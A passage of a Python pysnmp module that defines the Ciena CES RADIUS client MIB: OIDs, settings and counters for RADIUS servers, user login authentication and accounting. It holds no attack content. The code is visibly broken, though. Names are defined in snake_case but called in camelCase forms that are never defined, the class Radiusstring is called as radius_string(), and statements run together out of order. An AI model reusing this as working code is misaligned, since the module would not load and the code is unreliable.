cienaCesRadiusDot1xAcctRoundTripTime=cienaCesRadiusDot1xAcctRoundTripTime, cienaCesRadiusClientServerAddr=cienaCesRadiusClientServerAddr, cienaCesRadiusUserLoginRequests=cienaCesRadiusUserLoginRequests, cienaCesRadiusDot1xAuthTimeout=cienaCesRadiusDot1xAuthTimeout, cienaCesRadiusDot1xAuth=cienaCesRadiusDot1xAuth, cienaCesRadiusUserLoginAddr=cienaCesRadiusUserLoginAddr, cienaCesRadiusUserLoginAcctIndex=cienaCesRadiusUserLoginAcctIndex, cienaCesRadiusDot1xAuthRetries=cienaCesRadiusDot1xAuthRetries, cienaCesRadiusDot1xAcctAccessRejects=cienaCesRadiusDot1xAcctAccessRejects, cienaCesRadiusUserLoginPacketsDropped=cienaCesRadiusUserLoginPacketsDropped, cienaCesRadiusDot1xAuthPriority=cienaCesRadiusDot1xAuthPriority, cienaCesRadiusDot1xAcctAccessAccepts=cienaCesRadiusDot1xAcctAccessAccepts, cienaCesRadiusUserLoginAccessAccepts=cienaCesRadiusUserLoginAccessAccepts, cienaCesRadiusUserLoginAcctRoundTripTime=cienaCesRadiusUserLoginAcctRoundTripTime, cienaCesRadiusClientServerTimeouts=cienaCesRadiusClientServerTimeouts, cienaCesRadiusDot1xAcctGlobal=cienaCesRadiusDot1xAcctGlobal, cienaCesRadiusClientMIBNotificationPrefix=cienaCesRadiusClientMIBNotificationPrefix, cienaCesRadiusUserLoginAcctResolvedInetAddress=cienaCesRadiusUserLoginAcctResolvedInetAddress, cienaCesRadiusDot1xAuthTimeouts=cienaCesRadiusDot1xAuthTimeouts, cienaCesRadiusUserLoginAcctBadAuthenticators=cienaCesRadiusUserLoginAcctBadAuthenticators, cienaCesRadiusUserLoginAcctStatus=cienaCesRadiusUserLoginAcctStatus, cienaCesRadiusClientServerRoundTripTime=cienaCesRadiusClientServerRoundTripTime, cienaCesRadiusUserLoginAuthSecret=cienaCesRadiusUserLoginAuthSecret, cienaCesRadiusDot1xAuthRetransmissions=cienaCesRadiusDot1xAuthRetransmissions, cienaCesRadiusUserLoginAcctRequests=cienaCesRadiusUserLoginAcctRequests, cienaCesRadiusDot1xAcctRequests=cienaCesRadiusDot1xAcctRequests, cienaCesRadiusDot1xAuthAddr=cienaCesRadiusDot1xAuthAddr, cienaCesRadiusClientServerPacketsDropped=cienaCesRadiusClientServerPacketsDropped, cienaCesRadiusDot1xAuthResolvedInetAddress=cienaCesRadiusDot1xAuthResolvedInetAddress, cienaCesRadiusDot1xAuthAccessChallenges=cienaCesRadiusDot1xAuthAccessChallenges, cienaCesRadiusUserLoginPriority=cienaCesRadiusUserLoginPriority, cienaCesRadiusDot1xAcctUnknownTypes=cienaCesRadiusDot1xAcctUnknownTypes)
(object_identifier, octet_string, integer) = mibBuilder.importSymbols('ASN1', 'ObjectIdentifier', 'OctetString', 'Integer') (named_values,) = mibBuilder.importSymbols('ASN1-ENUMERATION', 'NamedValues') (constraints_intersection, single_value_constraint, value_size_constraint, value_range_constraint, constraints_union) = mibBuilder.importSymbols('ASN1-REFINEMENT', 'ConstraintsIntersection', 'SingleValueConstraint', 'ValueSizeConstraint', 'ValueRangeConstraint', 'ConstraintsUnion') (ciena_ces_statistics,) = mibBuilder.importSymbols('CIENA-SMI', 'cienaCesStatistics') (ciena_global_state,) = mibBuilder.importSymbols('CIENA-TC', 'CienaGlobalState') (inet_address, inet_address_type) = mibBuilder.importSymbols('INET-ADDRESS-MIB', 'InetAddress', 'InetAddressType') (module_compliance, notification_group) = mibBuilder.importSymbols('SNMPv2-CONF', 'ModuleCompliance', 'NotificationGroup') (counter32, object_identity, integer32, module_identity, gauge32, notification_type, ip_address, time_ticks, mib_identifier, iso, bits, mib_scalar, mib_table, mib_table_row, mib_table_column, counter64, unsigned32) = mibBuilder.importSymbols('SNMPv2-SMI', 'Counter32', 'ObjectIdentity', 'Integer32', 'ModuleIdentity', 'Gauge32', 'NotificationType', 'IpAddress', 'TimeTicks', 'MibIdentifier', 'iso', 'Bits', 'MibScalar', 'MibTable', 'MibTableRow', 'MibTableColumn', 'Counter64', 'Unsigned32') (row_status, truth_value, textual_convention, display_string) = mibBuilder.importSymbols('SNMPv2-TC', 'RowStatus', 'TruthValue', 'TextualConvention', 'DisplayString') ciena_ces_radius_client_mib = module_identity((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3)) cienaCesRadiusClientMIB.setRevisions(('2016-02-17 00:00', '2015-07-22 00:00', '2015-06-22 00:00', '2014-06-12 00:00', '2014-01-02 00:00', '2012-04-17 00:00', '2010-05-18 00:00')) if mibBuilder.loadTexts: cienaCesRadiusClientMIB.setLastUpdated('201602170000Z') if mibBuilder.loadTexts: cienaCesRadiusClientMIB.setOrganization('Ciena Corp.') class Radiusstring(TextualConvention, OctetString): status = 'current' display_hint = '255a' subtype_spec = OctetString.subtypeSpec + constraints_union(value_size_constraint(0, 0), value_size_constraint(8, 64)) ciena_ces_radius_client_mib_objects = mib_identifier((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1)) ciena_ces_radius_client = mib_identifier((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1)) ciena_ces_radius_client_global = mib_identifier((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 1)) ciena_ces_radius_client_server = mib_identifier((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 2)) ciena_ces_radius_user_login = mib_identifier((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 3)) ciena_ces_radius_user_login_global = mib_identifier((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 3, 1)) ciena_ces_radius_dot1x_auth = mib_identifier((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 4)) ciena_ces_radius_dot1x_auth_global = mib_identifier((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 4, 1)) ciena_ces_radius_dot1x_acct = mib_identifier((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 5)) ciena_ces_radius_dot1x_acct_global = mib_identifier((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 5, 1)) ciena_ces_radius_user_login_acct = mib_identifier((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 6)) ciena_ces_radius_user_login_acct_global = mib_identifier((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 6, 1)) ciena_ces_radius_client_mib_notification_prefix = mib_identifier((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 2)) ciena_ces_radius_client_mib_notifications = mib_identifier((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 2, 0)) ciena_ces_radius_client_mib_conformance = mib_identifier((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 3)) ciena_ces_radius_client_mib_compliances = mib_identifier((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 3, 1)) ciena_ces_radius_client_mib_groups = mib_identifier((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 3, 2)) ciena_ces_radius_admin_state = mib_scalar((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 1, 1), ciena_global_state()).setMaxAccess('readwrite') if mibBuilder.loadTexts: cienaCesRadiusAdminState.setStatus('current') ciena_ces_radius_oper_state = mib_scalar((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 1, 2), ciena_global_state()).setMaxAccess('readonly') if mibBuilder.loadTexts: cienaCesRadiusOperState.setStatus('current') ciena_ces_radius_client_timeout = mib_scalar((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 1, 3), integer32().subtype(subtypeSpec=value_range_constraint(1, 30)).clone(1)).setUnits('seconds').setMaxAccess('readwrite') if mibBuilder.loadTexts: cienaCesRadiusClientTimeout.setStatus('deprecated') ciena_ces_radius_client_retries = mib_scalar((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 1, 4), integer32().subtype(subtypeSpec=value_range_constraint(0, 3)).clone(3)).setMaxAccess('readwrite') if mibBuilder.loadTexts: cienaCesRadiusClientRetries.setStatus('deprecated') ciena_ces_radius_client_auth_key = mib_scalar((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 1, 5), radius_string()).setMaxAccess('readwrite') if mibBuilder.loadTexts: cienaCesRadiusClientAuthKey.setStatus('deprecated') ciena_ces_radius_client_auth_key_unset = mib_scalar((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 1, 6), truth_value()).setMaxAccess('readwrite') if mibBuilder.loadTexts: cienaCesRadiusClientAuthKeyUnset.setStatus('deprecated') ciena_ces_radius_client_search_type = mib_scalar((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 1, 7), integer32().subtype(subtypeSpec=constraints_union(single_value_constraint(1, 2))).clone(namedValues=named_values(('cached', 1), ('priority', 2)))).setMaxAccess('readwrite') if mibBuilder.loadTexts: cienaCesRadiusClientSearchType.setStatus('deprecated') ciena_ces_radius_client_server_table = mib_table((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 2, 1)) if mibBuilder.loadTexts: cienaCesRadiusClientServerTable.setStatus('deprecated') ciena_ces_radius_client_server_entry = mib_table_row((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 2, 1, 1)).setIndexNames((0, 'CIENA-CES-RADIUS-CLIENT-MIB', 'cienaCesRadiusClientServerIndex')) if mibBuilder.loadTexts: cienaCesRadiusClientServerEntry.setStatus('deprecated') ciena_ces_radius_client_server_index = mib_table_column((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 2, 1, 1, 1), integer32().subtype(subtypeSpec=value_range_constraint(1, 8))) if mibBuilder.loadTexts: cienaCesRadiusClientServerIndex.setStatus('deprecated') ciena_ces_radius_client_server_addr = mib_table_column((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 2, 1, 1, 2), display_string()).setMaxAccess('readcreate') if mibBuilder.loadTexts: cienaCesRadiusClientServerAddr.setStatus('deprecated') ciena_ces_radius_client_server_resolved_addr = mib_table_column((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 2, 1, 1, 3), ip_address()).setMaxAccess('readonly') if mibBuilder.loadTexts: cienaCesRadiusClientServerResolvedAddr.setStatus('deprecated') ciena_ces_radius_client_server_priority = mib_table_column((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 2, 1, 1, 4), integer32()).setMaxAccess('readcreate') if mibBuilder.loadTexts: cienaCesRadiusClientServerPriority.setStatus('deprecated') ciena_ces_radius_client_server_auth_port = mib_table_column((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 2, 1, 1, 5), integer32().subtype(subtypeSpec=value_range_constraint(1, 65535)).clone(1812)).setMaxAccess('readcreate') if mibBuilder.loadTexts: cienaCesRadiusClientServerAuthPort.setStatus('deprecated') ciena_ces_radius_client_server_round_trip_time = mib_table_column((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 2, 1, 1, 6), time_ticks()).setMaxAccess('readonly') if mibBuilder.loadTexts: cienaCesRadiusClientServerRoundTripTime.setStatus('deprecated') ciena_ces_radius_client_server_access_requests = mib_table_column((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 2, 1, 1, 7), counter32()).setMaxAccess('readonly') if mibBuilder.loadTexts: cienaCesRadiusClientServerAccessRequests.setStatus('deprecated') ciena_ces_radius_client_server_access_retransmissions = mib_table_column((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 2, 1, 1, 8), counter32()).setMaxAccess('readonly') if mibBuilder.loadTexts: cienaCesRadiusClientServerAccessRetransmissions.setStatus('deprecated') ciena_ces_radius_client_server_access_accepts = mib_table_column((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 2, 1, 1, 9), counter32()).setMaxAccess('readonly') if mibBuilder.loadTexts: cienaCesRadiusClientServerAccessAccepts.setStatus('deprecated') ciena_ces_radius_client_server_access_rejects = mib_table_column((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 2, 1, 1, 10), counter32()).setMaxAccess('readonly') if mibBuilder.loadTexts: cienaCesRadiusClientServerAccessRejects.setStatus('deprecated') ciena_ces_radius_client_server_access_challenges = mib_table_column((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 2, 1, 1, 11), counter32()).setMaxAccess('readonly') if mibBuilder.loadTexts: cienaCesRadiusClientServerAccessChallenges.setStatus('deprecated') ciena_ces_radius_client_server_malformed_access_responses = mib_table_column((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 2, 1, 1, 12), counter32()).setMaxAccess('readonly') if mibBuilder.loadTexts: cienaCesRadiusClientServerMalformedAccessResponses.setStatus('deprecated') ciena_ces_radius_client_server_bad_authenticators = mib_table_column((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 2, 1, 1, 13), counter32()).setMaxAccess('readonly') if mibBuilder.loadTexts: cienaCesRadiusClientServerBadAuthenticators.setStatus('deprecated') ciena_ces_radius_client_server_pending_requests = mib_table_column((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 2, 1, 1, 14), gauge32()).setMaxAccess('readonly') if mibBuilder.loadTexts: cienaCesRadiusClientServerPendingRequests.setStatus('deprecated') ciena_ces_radius_client_server_timeouts = mib_table_column((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 2, 1, 1, 15), counter32()).setMaxAccess('readonly') if mibBuilder.loadTexts: cienaCesRadiusClientServerTimeouts.setStatus('deprecated') ciena_ces_radius_client_server_unknown_types = mib_table_column((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 2, 1, 1, 16), counter32()).setMaxAccess('readonly') if mibBuilder.loadTexts: cienaCesRadiusClientServerUnknownTypes.setStatus('deprecated') ciena_ces_radius_client_server_packets_dropped = mib_table_column((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 2, 1, 1, 17), counter32()).setMaxAccess('readonly') if mibBuilder.loadTexts: cienaCesRadiusClientServerPacketsDropped.setStatus('deprecated') ciena_ces_radius_client_server_application = mib_table_column((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 2, 1, 1, 18), integer32().subtype(subtypeSpec=constraints_union(single_value_constraint(1, 2))).clone(namedValues=named_values(('userLogin', 1), ('all', 2))).clone('all')).setMaxAccess('readcreate') if mibBuilder.loadTexts: cienaCesRadiusClientServerApplication.setStatus('deprecated') ciena_ces_radius_client_server_status = mib_table_column((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 2, 1, 1, 19), row_status()).setMaxAccess('readcreate') if mibBuilder.loadTexts: cienaCesRadiusClientServerStatus.setStatus('deprecated') ciena_ces_radius_user_login_timeout = mib_scalar((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 3, 1, 1), integer32().subtype(subtypeSpec=value_range_constraint(1, 30)).clone(1)).setUnits('seconds').setMaxAccess('readwrite') if mibBuilder.loadTexts: cienaCesRadiusUserLoginTimeout.setStatus('current') ciena_ces_radius_user_login_retries = mib_scalar((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 3, 1, 2), integer32().subtype(subtypeSpec=value_range_constraint(0, 3)).clone(3)).setMaxAccess('readwrite') if mibBuilder.loadTexts: cienaCesRadiusUserLoginRetries.setStatus('current') ciena_ces_radius_user_login_auth_key = mib_scalar((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 3, 1, 3), radius_string()).setMaxAccess('readwrite') if mibBuilder.loadTexts: cienaCesRadiusUserLoginAuthKey.setStatus('current') ciena_ces_radius_user_login_search_type = mib_scalar((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 3, 1, 4), integer32().subtype(subtypeSpec=constraints_union(single_value_constraint(1, 2))).clone(namedValues=named_values(('cached', 1), ('priority', 2)))).setMaxAccess('readwrite') if mibBuilder.loadTexts: cienaCesRadiusUserLoginSearchType.setStatus('current') ciena_ces_radius_user_login_auth_secret = mib_scalar((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 3, 1, 5), octet_string().subtype(subtypeSpec=value_size_constraint(0, 259))).setMaxAccess('readwrite') if mibBuilder.loadTexts: cienaCesRadiusUserLoginAuthSecret.setStatus('current') ciena_ces_radius_user_login_table = mib_table((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 3, 2)) if mibBuilder.loadTexts: cienaCesRadiusUserLoginTable.setStatus('current') ciena_ces_radius_user_login_entry = mib_table_row((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 3, 2, 1)).setIndexNames((0, 'CIENA-CES-RADIUS-CLIENT-MIB', 'cienaCesRadiusUserLoginIndex')) if mibBuilder.loadTexts: cienaCesRadiusUserLoginEntry.setStatus('current') ciena_ces_radius_user_login_index = mib_table_column((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 3, 2, 1, 1), integer32().subtype(subtypeSpec=value_range_constraint(1, 8))) if mibBuilder.loadTexts: cienaCesRadiusUserLoginIndex.setStatus('current') ciena_ces_radius_user_login_resolved_inet_addr_type = mib_table_column((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 3, 2, 1, 2), inet_address_type()).setMaxAccess('readonly') if mibBuilder.loadTexts: cienaCesRadiusUserLoginResolvedInetAddrType.setStatus('current') ciena_ces_radius_user_login_resolved_inet_address = mib_table_column((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 3, 2, 1, 3), inet_address()).setMaxAccess('readonly') if mibBuilder.loadTexts: cienaCesRadiusUserLoginResolvedInetAddress.setStatus('current') ciena_ces_radius_user_login_addr = mib_table_column((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 3, 2, 1, 4), display_string()).setMaxAccess('readcreate') if mibBuilder.loadTexts: cienaCesRadiusUserLoginAddr.setStatus('current') ciena_ces_radius_user_login_priority = mib_table_column((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 3, 2, 1, 5), integer32()).setMaxAccess('readcreate') if mibBuilder.loadTexts: cienaCesRadiusUserLoginPriority.setStatus('current') ciena_ces_radius_user_login_auth_port = mib_table_column((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 3, 2, 1, 6), integer32().subtype(subtypeSpec=value_range_constraint(1, 65535)).clone(1812)).setMaxAccess('readcreate') if mibBuilder.loadTexts: cienaCesRadiusUserLoginAuthPort.setStatus('current') ciena_ces_radius_user_login_clear_statistics = mib_table_column((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 3, 2, 1, 7), truth_value()).setMaxAccess('readwrite') if mibBuilder.loadTexts: cienaCesRadiusUserLoginClearStatistics.setStatus('current') ciena_ces_radius_user_login_round_trip_time = mib_table_column((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 3, 2, 1, 8), time_ticks()).setMaxAccess('readonly') if mibBuilder.loadTexts: cienaCesRadiusUserLoginRoundTripTime.setStatus('current') ciena_ces_radius_user_login_requests = mib_table_column((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 3, 2, 1, 9), counter32()).setMaxAccess('readonly') if mibBuilder.loadTexts: cienaCesRadiusUserLoginRequests.setStatus('current') ciena_ces_radius_user_login_retransmissions = mib_table_column((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 3, 2, 1, 10), counter32()).setMaxAccess('readonly') if mibBuilder.loadTexts: cienaCesRadiusUserLoginRetransmissions.setStatus('current') ciena_ces_radius_user_login_access_accepts = mib_table_column((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 3, 2, 1, 11), counter32()).setMaxAccess('readonly') if mibBuilder.loadTexts: cienaCesRadiusUserLoginAccessAccepts.setStatus('current') ciena_ces_radius_user_login_access_rejects = mib_table_column((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 3, 2, 1, 12), counter32()).setMaxAccess('readonly') if mibBuilder.loadTexts: cienaCesRadiusUserLoginAccessRejects.setStatus('current') ciena_ces_radius_user_login_access_challenges = mib_table_column((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 3, 2, 1, 13), counter32()).setMaxAccess('readonly') if mibBuilder.loadTexts: cienaCesRadiusUserLoginAccessChallenges.setStatus('current') ciena_ces_radius_user_login_accounting_responses = mib_table_column((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 3, 2, 1, 14), counter32()).setMaxAccess('readonly') if mibBuilder.loadTexts: cienaCesRadiusUserLoginAccountingResponses.setStatus('current') ciena_ces_radius_user_login_malformed_responses = mib_table_column((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 3, 2, 1, 15), counter32()).setMaxAccess('readonly') if mibBuilder.loadTexts: cienaCesRadiusUserLoginMalformedResponses.setStatus('current') ciena_ces_radius_user_login_bad_authenticators = mib_table_column((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 3, 2, 1, 16), counter32()).setMaxAccess('readonly') if mibBuilder.loadTexts: cienaCesRadiusUserLoginBadAuthenticators.setStatus('current') ciena_ces_radius_user_login_timeouts = mib_table_column((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 3, 2, 1, 17), counter32()).setMaxAccess('readonly') if mibBuilder.loadTexts: cienaCesRadiusUserLoginTimeouts.setStatus('current') ciena_ces_radius_user_login_unknown_types = mib_table_column((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 3, 2, 1, 18), counter32()).setMaxAccess('readonly') if mibBuilder.loadTexts: cienaCesRadiusUserLoginUnknownTypes.setStatus('current') ciena_ces_radius_user_login_packets_dropped = mib_table_column((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 3, 2, 1, 19), counter32()).setMaxAccess('readonly') if mibBuilder.loadTexts: cienaCesRadiusUserLoginPacketsDropped.setStatus('current') ciena_ces_radius_user_login_status = mib_table_column((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 3, 2, 1, 20), row_status()).setMaxAccess('readcreate') if mibBuilder.loadTexts: cienaCesRadiusUserLoginStatus.setStatus('current') ciena_ces_radius_user_login_acct_admin_state = mib_scalar((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 6, 1, 1), integer32().subtype(subtypeSpec=constraints_union(single_value_constraint(1, 2))).clone(namedValues=named_values(('disabled', 1), ('enabled', 2)))).setMaxAccess('readwrite') if mibBuilder.loadTexts: cienaCesRadiusUserLoginAcctAdminState.setStatus('current') ciena_ces_radius_user_login_acct_timeout = mib_scalar((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 6, 1, 2), integer32().subtype(subtypeSpec=value_range_constraint(1, 30)).clone(1)).setUnits('seconds').setMaxAccess('readwrite') if mibBuilder.loadTexts: cienaCesRadiusUserLoginAcctTimeout.setStatus('current') ciena_ces_radius_user_login_acct_retries = mib_scalar((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 6, 1, 3), integer32().subtype(subtypeSpec=value_range_constraint(0, 3)).clone(3)).setMaxAccess('readwrite') if mibBuilder.loadTexts: cienaCesRadiusUserLoginAcctRetries.setStatus('current') ciena_ces_radius_user_login_acct_auth_key = mib_scalar((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 6, 1, 4), radius_string()).setMaxAccess('readwrite') if mibBuilder.loadTexts: cienaCesRadiusUserLoginAcctAuthKey.setStatus('current') ciena_ces_radius_user_login_acct_search_type = mib_scalar((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 6, 1, 5), integer32().subtype(subtypeSpec=constraints_union(single_value_constraint(1, 2))).clone(namedValues=named_values(('cached', 1), ('priority', 2)))).setMaxAccess('readwrite') if mibBuilder.loadTexts: cienaCesRadiusUserLoginAcctSearchType.setStatus('current') ciena_ces_radius_user_login_acct_auth_secret = mib_scalar((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 6, 1, 6), octet_string().subtype(subtypeSpec=value_size_constraint(0, 259))).setMaxAccess('readwrite') if mibBuilder.loadTexts: cienaCesRadiusUserLoginAcctAuthSecret.setStatus('current') ciena_ces_radius_user_login_acct_table = mib_table((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 6, 2)) if mibBuilder.loadTexts: cienaCesRadiusUserLoginAcctTable.setStatus('current') ciena_ces_radius_user_login_acct_entry = mib_table_row((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 6, 2, 1)).setIndexNames((0, 'CIENA-CES-RADIUS-CLIENT-MIB', 'cienaCesRadiusUserLoginAcctIndex')) if mibBuilder.loadTexts: cienaCesRadiusUserLoginAcctEntry.setStatus('current') ciena_ces_radius_user_login_acct_index = mib_table_column((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 6, 2, 1, 1), integer32().subtype(subtypeSpec=value_range_constraint(1, 8))) if mibBuilder.loadTexts: cienaCesRadiusUserLoginAcctIndex.setStatus('current') ciena_ces_radius_user_login_acct_resolved_inet_addr_type = mib_table_column((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 6, 2, 1, 2), inet_address_type()).setMaxAccess('readonly') if mibBuilder.loadTexts: cienaCesRadiusUserLoginAcctResolvedInetAddrType.setStatus('current') ciena_ces_radius_user_login_acct_resolved_inet_address = mib_table_column((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 6, 2, 1, 3), inet_address()).setMaxAccess('readonly') if mibBuilder.loadTexts: cienaCesRadiusUserLoginAcctResolvedInetAddress.setStatus('current') ciena_ces_radius_user_login_acct_addr = mib_table_column((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 6, 2, 1, 4), display_string()).setMaxAccess('readcreate') if mibBuilder.loadTexts: cienaCesRadiusUserLoginAcctAddr.setStatus('current') ciena_ces_radius_user_login_acct_priority = mib_table_column((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 6, 2, 1, 5), integer32()).setMaxAccess('readcreate') if mibBuilder.loadTexts: cienaCesRadiusUserLoginAcctPriority.setStatus('current') ciena_ces_radius_user_login_acct_auth_port = mib_table_column((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 6, 2, 1, 6), integer32().subtype(subtypeSpec=value_range_constraint(1, 65535)).clone(1812)).setMaxAccess('readcreate') if mibBuilder.loadTexts: cienaCesRadiusUserLoginAcctAuthPort.setStatus('current') ciena_ces_radius_user_login_acct_clear_statistics = mib_table_column((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 6, 2, 1, 7), truth_value()).setMaxAccess('readwrite') if mibBuilder.loadTexts: cienaCesRadiusUserLoginAcctClearStatistics.setStatus('current') ciena_ces_radius_user_login_acct_round_trip_time = mib_table_column((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 6, 2, 1, 8), time_ticks()).setMaxAccess('readonly') if mibBuilder.loadTexts: cienaCesRadiusUserLoginAcctRoundTripTime.setStatus('current') ciena_ces_radius_user_login_acct_requests = mib_table_column((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 6, 2, 1, 9), counter32()).setMaxAccess('readonly') if mibBuilder.loadTexts: cienaCesRadiusUserLoginAcctRequests.setStatus('current') ciena_ces_radius_user_login_acct_retransmissions = mib_table_column((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 6, 2, 1, 10), counter32()).setMaxAccess('readonly') if mibBuilder.loadTexts: cienaCesRadiusUserLoginAcctRetransmissions.setStatus('current') ciena_ces_radius_user_login_acct_access_accepts = mib_table_column((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 6, 2, 1, 11), counter32()).setMaxAccess('readonly') if mibBuilder.loadTexts: cienaCesRadiusUserLoginAcctAccessAccepts.setStatus('current') ciena_ces_radius_user_login_acct_access_rejects = mib_table_column((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 6, 2, 1, 12), counter32()).setMaxAccess('readonly') if mibBuilder.loadTexts: cienaCesRadiusUserLoginAcctAccessRejects.setStatus('current') ciena_ces_radius_user_login_acct_access_challenges = mib_table_column((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 6, 2, 1, 13), counter32()).setMaxAccess('readonly') if mibBuilder.loadTexts: cienaCesRadiusUserLoginAcctAccessChallenges.setStatus('current') ciena_ces_radius_user_login_acct_accounting_responses = mib_table_column((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 6, 2, 1, 14), counter32()).setMaxAccess('readonly') if mibBuilder.loadTexts: cienaCesRadiusUserLoginAcctAccountingResponses.setStatus('current') ciena_ces_radius_user_login_acct_malformed_responses = mib_table_column((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 6, 2, 1, 15), counter32()).setMaxAccess('readonly') if mibBuilder.loadTexts: cienaCesRadiusUserLoginAcctMalformedResponses.setStatus('current') ciena_ces_radius_user_login_acct_bad_authenticators = mib_table_column((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 6, 2, 1, 16), counter32()).setMaxAccess('readonly') if mibBuilder.loadTexts: cienaCesRadiusUserLoginAcctBadAuthenticators.setStatus('current') ciena_ces_radius_user_login_acct_timeouts = mib_table_column((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 6, 